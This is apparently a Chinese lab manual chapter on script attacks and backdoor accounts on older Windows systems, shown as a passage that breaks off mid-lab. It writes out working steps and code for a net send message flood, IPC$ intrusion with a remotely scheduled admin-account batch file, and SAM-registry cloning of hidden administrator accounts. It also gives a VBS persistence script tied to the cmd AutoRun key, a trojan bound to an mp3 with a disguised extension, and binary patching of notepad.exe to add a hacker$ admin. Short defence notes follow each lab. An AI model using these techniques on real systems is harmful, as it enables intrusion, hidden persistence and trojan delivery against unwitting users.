网络安全(黑客攻防)-脚本攻击与后门2

第5章脚本攻击与后门帐号的建立实验5-1：死循环消息脚本攻击一、实验目的二、实验设备三、实验步骤四、实验小结五、防御措施实验5-1：死循环消息脚本攻击

很多时候，我们会发现在自己的主机上收到一个窗口，该窗口只有一个“确定”钮，该窗口既不能最小化也不能关闭，而且该窗口得到了操作的焦点，只能点击“确定”，而一旦我们点击“确定”钮，马上又弹出一个一模一样的新窗口。该窗口就是死循环窗口，会消耗尽我们的内存。这是在Windows操作系统默认情况下，利用了Messenger服务自动启动的漏洞来实施攻击的。一、实验目的

了解默认自动启动的Messenger服务的安全隐患，利用该安全隐患发动攻击。

二、实验设备2台以上的Windows主机，一台主机A为Windows2kServer，另一台主机B为Windows的操作系统(如果B机为非WIN2k的操作系统，需要保证“管理工具”中的messenger服务为启动状态)。

三、实验步骤1、在A主机上建立一个名为999.bat的批处理文件，具体内容如下：

:again

netsend*“hello”

gotoagain2、双击运行999.bat，结果是局域网中的所有主机均可收到死循环消息包，如图5-1。图5-1局域网中的主机收到死循环消息包四、实验小结

本实验利用Messenger服务默认自动启动的特性，向局域网中的主机发死循环包，使得凡是开启Messenger服务的主机均无法正常运行，只能收到大量的死循环消息包。

五、防御措施

在受害机上将Messenger服务设置为禁用或停用，就收不到死循环消息包了。实验5-2：利用IPC$实现管道入侵一、实验目的二、实验设备三、实验步骤四、实验小结五、防御措施实验5-2：利用IPC$实现管道入侵

IPC$(InternetProcessConnection)是共享“命名管道”的资源。它是为了让进程间相互通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限，在远程管理计算机和查看计算机的共享资源时使用。利用IPC$，连接者甚至可以与目标主机建立一个空连接而无需用户名与密码(对方机器必须开启IPC$共享，否则是连接不上的)。利用这个空连接，连接者还可以得到目标主机上的用户列表(不过负责目标主机的管理员会禁止导出用户列表的)。所谓IPC$漏洞，其实并不是真正意义上的漏洞，它是为了方便管理员的远程管理而开放的远程网络登陆功能。它打开了默认共享，即所有的逻辑盘(C$，D$，E$……)和系统目录Winnt（或Windows）下的Admin$。所有这些都是为了方便管理员的管理，但一些黑客会利用IPC$，访问共享资源、导出用户列表，并使用一些字典工具进行密码探测，寄希望于获得更高的权限，从而达到不可告人的目的。一、实验目的

了解默认设置的缺陷及安全隐患，掌握去掉这些安全隐患的配置方法。

二、实验设备2台Windows主机，一台WindowsXP机称为A机，另一台为Windows2kServer称为B机（IP地址为192.168.0.250）。

主机A主机B三、实验步骤(1)1、A机通过IPC$与B机建立连接。（1）空连接：在A机上进入DOS命令行方式，敲入netuse\\192.168.0.250\ipc$“”：“”。其中，192.168.0.250是B机的IP。当空连接成功建立后，便可执行如下的操作（如果空连接不能成功建立，则先转（2）再做（1）中的①，②，③）。①使用netview\\192.168.0.250命令，查看B主机的共享资源，如图5－2。图5－2查看B机的共享资源②使用nettime\\192.168.0.250命令，查看B主机的当前时间，如图5－3。图5－3查看B主机的当前时间③使用nbtstat-a192.168.0.250命令，得到主机B的NetBIOS用户名列表，此命令需要B主机的NetBIOS支持，如图5－4。图5－4查看B主机的NetBIOS用户名列表（2）A主机的DOS窗口中，输入netuse\\192.168.0.250\ipc$/user:administrator命令，以管理员身份与B机建立连接。如果屏幕提示需要输入口令，则输入B机管理员的口令，如图5－5。图5－5以管理员身份与B机相连

三、实验步骤(2)2、若上一步骤成功，则可以在A机D盘上建立一个具有如下语句的批处理文件123.cmd（1）netuserjqm/add（2）netlocalgroupadministratorsjqm/add

三、实验步骤(3)3、通过网络拷贝的方法将123.cmd这个批处理文件拷贝至受害主机B的C盘根目录下。（网络拷贝命令为copyd:\123.cmd\\192.168.0.250\C$）

三、实验步骤(4)4、在A主机上使用at命令让123.cmd文件在实验机的某一指定时间运行。（1）nettime\\192.168.0.250（2）at\\192.168.0.25011:00c:\123.cmd，（图5－6A机上使用at命令让B机在某一指定时间运行123.cmd文件。）。其中，11：00为程序运行时间。（3）查看程序123.cmd是否已经在B主机上得到运行：使用at\\192.168.0.250命令，如果屏幕提示清单是空的表明批处理文件已经运行，（图5－7查看123.cmd文件是否已经在B机上运行）。这样，在B机上便建立一个具有超级用户权限的名为jqm的用户帐号。

三、实验步骤(5)5、在A机或者局域网范围内的其它主机上用jqm的用户身份可以与B机以管理员权限建立连接。连接成功后，就可以像使用自己主机一样使用B机的命令行。

四、实验小结

本实验是利用Windows系统默认开启的139端口（IPC$）、“TaskScheduler”服务、Lanmanserver服务(服务显示名称为Server)、Lanmanworkstation服务共同作用来完成的。对于黑客机来说，如果想与远程主机建立连接（不管是否是空连接），远程主机上的前三个服务缺一不可，黑客本机必须要开启Lanmanworkstation服务（服务显示名称为Workstation）才行。

五、防御措施（1）受害主机上禁用taskscheduler服务。（2）可以选择下列方法中的任何一种，去掉IPC$。①在受害主机上选择“网上邻居”，右击->属性->本地连接->TCP/IP->高级->“WINS”标签卡，选择禁用NetBIOS。对于Win2k服务器端来说，如果允许NetBIOS,那么UDP的137、138端口,以及TCP的139、445端口将开放；如果禁止NetBIOS，那么只有445端口开放，（图5－8去掉IPC$）。可见，如果远程服务器没有监听139或445端口，那么IPC$连接是无法建立的。②受害主机的防火墙中禁用139端口。③受害主机上禁用NetLogon服务（网络登录服务）。④受害主机上禁用Lanmanserver服务（显示名为Server），它提供了RPC支持、文件、打印以及命名管道共享。IPC$依赖于此服务。注意：对于黑客机，如果未启动Lanmanworkstation服务（它提供网络连接和通讯），那么就无法向网络中的其它主机发起连接请求（显示名为Workstation）。⑤在每台主机上建立一个名为123.cmd的批处理文件，写入netshareIPC$/del语句。并且把123.cmd拖入桌面上的“开始”菜单―>“所有程序”―>“启动”中。实验5－3：在Windows中克隆管理员帐号一、实验目的二、实验设备三、实验步骤四、实验小结五、防御措施实验5－3：在Windows中克隆管理员帐号

众所周知，在Windows中对某个帐号赋予权限，最好的方法是让该帐号属于某个具有相应权限的组。不过，这样一来在计算机管理中是可以查看出来的。有没有方法既能让该帐号具有相应组的权限，又在计算机管理中无法让人发觉呢？克隆（隐形提权）是个不错的选择。克隆管理员帐户是指：在计算机上使一个不属于管理员组的帐号具有与管理员一样的权限。本例中将Guest帐号利用注册表克隆成具有管理员权限的帐号。一、实验目的

了解并掌握如何对帐号进行克隆。二、实验设备1台以上的Windows操作系统主机，可以是Windows2KServer/XP操作系统。如果是win2003SERVER，最好是正式版（否则实验时需要将注册表SAM键旁边的security键设置管理员帐号完全控制权限）；如果是XP，则只能是XP的SP2以下版本。三、实验步骤（1）1、找到“开始”任务栏－>运行－>regedit。打开注册表编辑器之后依次展开HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users。注意：这里由于权限的问题,可能Sam下不会看到任何子键。此时在Sam键上点右键－>权限－>将Administrators的权限设置为完全控制，点“确定”后刷新一次注册表，Sam子键下的内容就会出现了，（图5－9注册表中管理员帐号权限的对应项）。Administrator对应的项为“000001F4”，下面有两个二进制值：一个是“F”，一个是“V”。Guest的项为“000003ee”。三、实验步骤（2）2、分别将Administrator和Guest两项导出，分别命名为A.reg和G.reg，（图5－10将注册表中的某些项导出）。三、实验步骤（3）3、用记事本将导出的两个.reg文件打开，将A.reg中“F”的内容全部复制，（图5－11复制管理员权限）所示，并且粘贴到G.reg中“F”对应的内容，将原G.reg中“F”的内容全部替换掉。三、实验步骤（4）4、保存G.reg更改的内容并退出。三、实验步骤（5）5、双击G.reg，将其导入到注册表当中。至此便完成了将Guest克隆成具有管理员权限的帐户。重启机器后便可以Guest帐户登录系统，而且在“计算机管理”中查看到Guest帐户不属于管理员组,而且该帐户并没有被激活。三、实验步骤（6）6、验证：如果是一台机，则直接注销并以Guest帐号身份登录，发觉可以建其它用户帐号（证明其具有管理员权限）。如果在两台机器上验证，在另一台主机上则可使用Guest帐号登录至该机，并可以在该机上远程建立用户帐号。四、实验小结Windows操作系统中的任何配置在注册表中均能实现，本实验恰恰验证了这一点。在注册表中进行克隆的Guest帐号在计算机管理中无法查看出它属于管理员组的成员，但是它的确已经具有了管理员的权限。五、防御措施

计算机的使用者需要经常查看本实验注册表中对应项的设置，查看是否有被克隆的管理员帐号。实验5－4：建立不死帐号一、实验目的二、实验设备三、实验步骤四、实验小结五、防御措施实验5－4：建立不死帐号

在Windows操作系统默认情况下，Guest帐号是禁用的。可是很多时候，我们会发现自己主机的Guest帐号被莫名其妙地激活了。更为奇怪的是，我们将Guest帐号设置为禁用后不久，Guest帐号又处于激活状态，即Guest帐号成为了不死帐号。通过仔细研究发现这是因为在注册表中将Guest帐号激活语句与Cmd.exe程序的运行语句进行了关联的结果。

一、实验目的

了解并掌握注册表在帐号激活方面的作用。

二、实验设备2台Windows主机，可以是Windows2KServer或XP。

三、实验步骤（1）1、本机D盘根目录上建立名为123.vbs的文件，其内容如下：

Dimwsh

Setwsh=CreateObject(“wscript.shell”)

wsh.run“netuserguest/active:yes”,0

wsh.run“netuserguestaaa”,0

wsh.run“netlocalgroupadministratorsguest/add”,0

三、实验步骤（2）2、将Guest帐号的激活语句与Cmd.exe程序的运行关联在一起：在注册表中找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CommandProcessor下的AutoRun键，双击它，在键值中设置为d:\123.vbs，关闭注册表，（图5－12在注册表中设置关联操作）。

说明：修改注册表的作用是将Cmd程序与来宾帐号的激活语句进行关联。

三、实验步骤（3）3、测试：运行123.vbs文件，管理员即使停用Guest帐号，但是只要在开始任务栏中运行Cmd.exe，则Guest帐号又被重新击活。

三、实验步骤（4）4、推广：此实验可以推广到开启3389端口的主机上，客户端主机将服务器端主机的Guest设为不死帐号。

四、实验小结

本实验利用注册表将Cmd命令的执行与Guest帐号激活并加入管理员组的脚本文件关联在一起，使得Cmd命令每执行一次，Guest帐号就会被激活并具有管理员权限。

五、防御措施

经常检查“计算机管理”中Guest帐号的状态，并检查注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CommandProcessor\AutoRun下的设置。

实验5－5：利用脚本实现木马与多媒体文件的绑定一、实验目的二、实验设备三、实验步骤四、实验小结五、防御措施实验5－5：利用脚本实现木马与多媒体文件的绑定

很多人从网络中下载资源时，下载的文件是由两个或多个初始文件绑定（指最终形成的文件在运行时，参与绑定的几个文件也一并得到运行）形成的。将同一类型的文件绑定，可以使用如“开山文件合并器”之类的软件实现。如果想将两个不同类型的文件绑定，需要使用脚本。脚本是使用一种特定的描述性语言并依据一定的格式编写的可执行文件。脚本通常可以由应用程序临时调用并执行。将脚本文件与.zip（或者.rar）压缩文件的自解压特性相结合，可以实现将木马与多媒体文件绑定。

一、实验目的

掌握VBS脚本的基本编写，掌握不同文件类型的绑定方法。二、实验设备1台以上的Windows主机。我们还要准备一款木马，一个ico图标文件（媒体文件或图片文件的图标），安装rar压缩软件以及一个素材文件（一段动画，一首mp3，或一张图片都可以）。三、实验步骤（1）1、将用来迷惑目标的素材压缩成为123.rar文件，并将脚本文件、木马添加其中，（图5－13压缩所有素材）。

其中，脚本文件run.vbs的代码如下：dimshell

setshell=CreateObject(“Wscript.Shell”)

shell.run“cmd/cstart%SystemRoot%\system32\123.mp3”,0

WScript.Sleep1000

shell.run“cmd/cstart%SystemRoot%\system32\setup.exe”,0注意：（1）cmd/c的含义：执行String

指定的命令，然后停止。（2）Start的含义：启动另一个窗口运行指定的程序或命令。

三、实验步骤（2）2、双击123.rar文件，点击压缩软件工具条上的“自解压格式”钮，再选择“高级自解压选项”，如图5－14。图5－14将压缩包进行自解压设置

三、实验步骤（3）3、在“常规”标签卡中,设解压路径为%systemroot%\system32\，解压后运行设为run.vbs（脚本文件），如图5－15。图5－15设置“常规”标签卡

三、实验步骤（4）4、在“模式”标签卡中，在“安静模式”框架中设置“全部隐藏”，在“覆盖方式”框架中设置“覆盖所有文件”，如图5－16。图5－16设置“模式”标签卡

三、实验步骤（5）5、在“文本和图标”标签卡中，从“文件加载自解压图标”中选择图标文件为tb.ico，如图5－17。之后，会出现一个图标为多媒体类型的扩展名为.exe形式的文件（名为123.exe），如图5－18。图5－17设置“文本和图标”标签卡图5－18生成名为123.exe的文件

三、实验步骤（6）6、在自解压文件的exe后缀前，加上其它的程序类型后缀，如.wmf和.gif等。这里可以将扩展名加上.mp3，文件名变成123.mp3.exe，如图5－19。图5－19将123.exe文件重新命名

三、实验步骤（7）7、在“我的电脑”中找到“查看”菜单->文件夹选项->“查看”标签卡中选择“隐藏已知文件类型的扩展名”前的复选框，如图5－20。123.mp3.exe文件变成了123.mp3文件，如图5－21。图5－20将“我的电脑”恢复成默认设置图5－21123.mp3.exe的真实扩展名被隐藏三、实验步骤（8）8、测试：双击123.mp3文件，在运行多媒体文件的同时，木马文件也在运行，如图5－22。图5－22测试绑定效果

四、实验小结

本实验通过脚本语言与压缩包的自解压特性相结合，实现了两个不同类型（.mp3和.exe）文件的绑定，利用的是系统默认的一些漏洞。

五、防御措施1、将电脑由默认设置改为如下设置：双击桌面上“我的电脑”图标－>“工具”菜单－>文件夹选项－>“查看”标签卡－>将默认的“隐藏已知文件的扩展名”前的复选框去掉，如图5－23。图5－23修改“我的电脑”的默认设置2、双击桌面上“我的电脑”图标－>“工具”菜单－>文件夹选项－>“文件类型”标签卡，将VBS脚本类型删除，如图5－24。图5－24删除VBS脚本类型实验5－6：利用注册表隐藏建立管理员帐号一、实验目的二、实验设备三、实验步骤四、实验小结五、防御措施实验5－6：利用注册表隐藏建立管理员帐号

很多情况下我们查看自己主机的“计算机管理”以及DOS命令行窗口时查看不到新建的用户帐号信息，但自己的主机的确在受远程主机的控制。其中一个原因是远程主机在受害主机处于非安全状态的某一时间段内充分利用这个空档，在受害主机上偷偷建立了后门帐号。

一、实验目的

了解注册表的权限设置、以及在注册表中查看帐号、权限的方法。

二、实验设备

2台以上的Windows主机，操作系统为Windows2K/XP。黑客机为A，实验机为B（B机最好安装Windows2kServer:如果是WINDOWS2003SERVER版,应该选取R1作为其补丁包类型；如果是WINDOWSXP，应该选取SP2以下版本作为其补丁包类型；如果是WINDOWS2000SERVER则无要求）。B机开启3389端口，而且其Administrator用户名、口令已经被黑客主机A获得。

三、实验步骤（1）1、黑客机A以administrator身份登录至B机桌面（以下操作都在B机桌面环境下运行）。

三、实验步骤（2）2、运行regedt32打开注册表编辑器，选中HKEY_LOCAL_MACHINE\SAM\SAM－>右击－>权限－>加入administrator，并将其权限设置为完全控制，再关闭注册表窗口。

三、实验步骤（3）3、在“开始”任务栏中－>运行regedit打开注册表编辑器，依次展开HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users。先查看注册表当前有哪些用户，其权限对应的是哪些项。可以看到Names下的administrator帐号对应的权限为000001f4，hacker$帐号对应的权限为000003f5(注意在注册表中我们新建立的hacker$帐号是非默认存在的用户帐号，无论在HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Names中hacker$排在第几位，对应的权限为注册表中HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users下那些默认帐号之后的新增项)，如图5－25。图5－25注册表中帐号与权限的对应关系

三、实验步骤（4）4、将hacker$，000001f4，000003f5这三项导出并分别命名为hacker$.reg，000001f4.reg，000003f5.reg。再用记事本对这几个导出的注册表文件进行编辑，将000001f4.reg下的F键值进行复制，并覆盖000003f5.reg中的F键的键值。然后将hacker$.reg与000003f5.reg合并至hacker$250.reg。

三、实验步骤（5、6）5、DOS命令行下运行netuserhacker$/del，删除hacker$。

6、双击hacker$250.reg，隐藏重建hacker$帐号。

三、实验步骤（7、8）7、运行regedt32，选中HKEY_LOCAL_MACHINE\SAM\SAM―>右击―>权限―>去掉administrator的权限（权限还原为默认设置）并关闭。

8、B机给自己的administrator帐号设置复杂口令。三、实验步骤（9）9、测试：A机重新以hacker$帐号连接至B机的3389端口，连接成功且具有管理员权限。在B机的DOS命令行、控制面板、注册表中都无法发现hacker$帐号的痕迹。

四、实验小结

微软的操作系统中所做的一切操作在注册表中都能找到配置痕迹，利用注册表的导入就可以增加一个管理员权限的用户帐号。

五、防御措施

用户使用主机时要经常查看注册表的信息，以免被黑客采用注册表导入的方式隐藏建立管理员权限的用户帐号。实验5－7：在免费软件中建立后门帐号

平时很多人喜欢从互联网上下载一些免费软件。可是，在免费软件安装并运行后，发觉这些软件的主机很容易被蠕虫、木马或病毒入侵，继而成为黑客远程控制的傀儡。这是因为绝大多数用户安装的软件是带有后门的免费软件。经过仔细研究，可以发现使用这些主机的用户在不知情的情况下，主机上增加了一些具有管理员权限的后门帐号。

所谓后门，是指程序员为了便于远程控制某台主机而故意留下的模块。程序员一般不会把后门记入软件的说明文档，因此用户通常无法了解后门的存在。后门帐号是指黑客利用各种手段在受害主机上偷偷建立的不易被人察觉的帐号。实验5－7：在免费软件中建立后门帐号

免费软件中的很多程序是黑客对正常程序进行修改之后保存生成的。以记事本程序为例，黑客可以修改正常的记事本程序，通过采用在正常的记事本程序运行之前插入建立后门帐号语句的方法来建立后门帐号。表5－1为反编译环境下正常记事本程序的结构，表5－2为反编译环境下带后门帐号的记事本程序结构。可见，当带后门的记事本程序运行时，建立后门帐号的语句先执行，记事本程序后执行；带后门的记事本程序在运行时除了先运行建立后门帐号的语句之外，其它语句的执行顺序和执行结果与正常的记事本程序一样。r1:jmpr5(r1为入口点地址)r2:call01006ca8┉┉┉┉┉r3:netuserhacker$1234/addr4:netlocalgroupadministratorshacker$/add┉r5:pushr3callWinExecpushr4callWinExecpush70Push01001888jmpr2┉┉┉┉┉┉┉┉┉r1:push70(入口点)push01001888r2:call01006ca8┉┉┉┉┉┉┉┉┉实验5－7：在免费软件中建立后门帐号

如果黑客使用带有后门的记事本程序替代正常的记事本程序放入XP系统或者其它Windows系统的安装包中，那么运行该安装包的主机一旦使用被修改后的记事本程序就会出现这个结果：表面上记事本程序能正常运行，而实际上一个具有管理员权限的后门帐号便会在该主机上秘密地建立。实验5-7-1：利用Windows自带的记事本程序建立后门帐号一、实验目的二、实验设备三、实验步骤四、实验小结五、防御措施一、实验目的

掌握在免费程序建立后门帐号的方法，学会利用在Windows自带的记事本程序中建立后门帐号，掌握使用免费版软件后保证自己主机安全性的方法。

二、实验设备2台Windows主机，主要在其中一台主机A上进行实验，另一台主机B在最后测试时才会用到。（由于操作系统不同、补丁包不同，所以零区域可能会与教材不同，甚至有些主机只能创建一个用户帐号而无法将其加入至管理员组中）

三、实验步骤（1）1、进入反编译环境并加载记事本程序：使用OllyDbg加载%systemroot%\system32目录下的notepad.exe，（图5－26进入反编译环境并加载记事本程序）。光标默认选中的第一条语句01006AE0处为程序的原入口点地址（此处相当于表5－1与表5－2中的r1），记下这个地址。并从此处起向下选五行（即将“01006AE0push70”，“01006AE2pushnotepad.01001888”，“01006AE7callnotepad.01006CA8”，“01006AECxorebx,ebx”，“01006AEEpushebx”这几条语句选中），复制下来。三、实验步骤（2）2、寻找零区域：至01007d7a处，（图5－27找到零区域）。三、实验步骤（3）3、建立具有管理员权限的后门帐号：选中01007d7a（此处相当于表5－2中的r3）至01007dca处－>右击－>二进制－>编辑－>输入netuserhacker$1234/add；选中01007d98（此处相当于表5－2中的r4）至01007db8处－>右击－>二进制－>编辑－>输入netlocalgroupadministratorshacker$/add,之后再右击－>

分析代码。

三、实验步骤（4）4、调用系统函数：在01007dc6处（此处相当于表5－2中的r5）写上“push01007D7A”（注意，此处不要写成”pushnotepad2.01007d7a”），在01007dcb处写上“callWinExec”，在01007DD0处写上“push01007D98”（注意，此处不要写成”pushnotepad2.01007DD0”），，在01007dd5处写上“callWinExec”，如图5－28。图5－28调用系统函数

三、实验步骤（5）5、修改入口点语句：记下第一条压入堆栈语句的地址01007DC6，回到程序的原入口点01006AE0处，将原先的汇编语句修改为“jmp01007dc6”（因为01007dc6相当于表5－2中的r5，所以这条跳转语句相当于表5－2中r1处的jmpr5），如图5－29。可以看到原01006ae0处—01006ae6处的语句全部被“jmp01007dc6”改写了，而01006ae7处的语句保持不变，就把01006ae7处作为返回点，将其地址记录下来（01006ae7处相当于表5－2中的r2）。图5－29修改入口点语句三、实验步骤（6）6、还原被跳转语句破坏的记事本程序：回到01007dc6处，在01007dda处将在文件原入口处被“jmp01007dc6”改写的语句填充上（在01007dda处用push70填充，在01007ddc处用push01001888填充，在01007de1处用jmp01006ae7填充），如图5－30。图5－30还原被跳转语句破坏的记事本程序

三、实验步骤（7）7、保存并测试：右击－>复制到可执行文件－>右击－>保存文件名为notepad2.exe

。运行notepad2.exe，我们可以发现屏幕出现记事本的界面（表明修改后的记事本程序可以正常运行）。进入“控制面板”的“用户帐户”，发现多了一个名为“hacker$”的管理员权限的用户帐号，这便是后门帐号，如图5－31。图5－31查看用户帐户

三、实验步骤（8）8、验证：在B机上用这个新建立的hacker$帐号身份可以与A机进行连接。

四、实验小结

出于节省资金的目的很多人习惯使用免费软件，但是要注意这些软件中可能带有后门（尤其是后门帐号）。后门将会给使用者造成意想不到的后果──即如果黑客将带有后门帐号的程序打包，那么使用了该程序的主机就会留有后门帐号。所以，用户使用免费软件时要注意经常查看有无自己不认识的帐号。

五、防御措施

用户如果经常使用免费版的软件，不但需要经常留意自己的主机上有无后门帐号，更重要的是用户需要让自己的主机处于一种专业的安全配置状态。否则，该主机将很容易被黑客进行远程控制。

实验5－7－2：利用Windows自带的计算器程序建立后门帐号一、实验目的二、实验设备三、实验步骤四、实验小结五、防御措施一、实验目的

掌握在免费程序建立后门帐号的方法，学会利用在Windows自带的计算器程序中建立后门帐号，掌握使用免费版软件后保证自己主机安全性的方法

二、实验设备2台Windows主机，主要在其中一台主机A上进行实验，另一台主机B在最后测试时才会用到。

三、实验步骤（1）1、加载：在A机上使用OllyDbg加载Windows自带的%systemroot%\system32目录下的计算器程序（即calc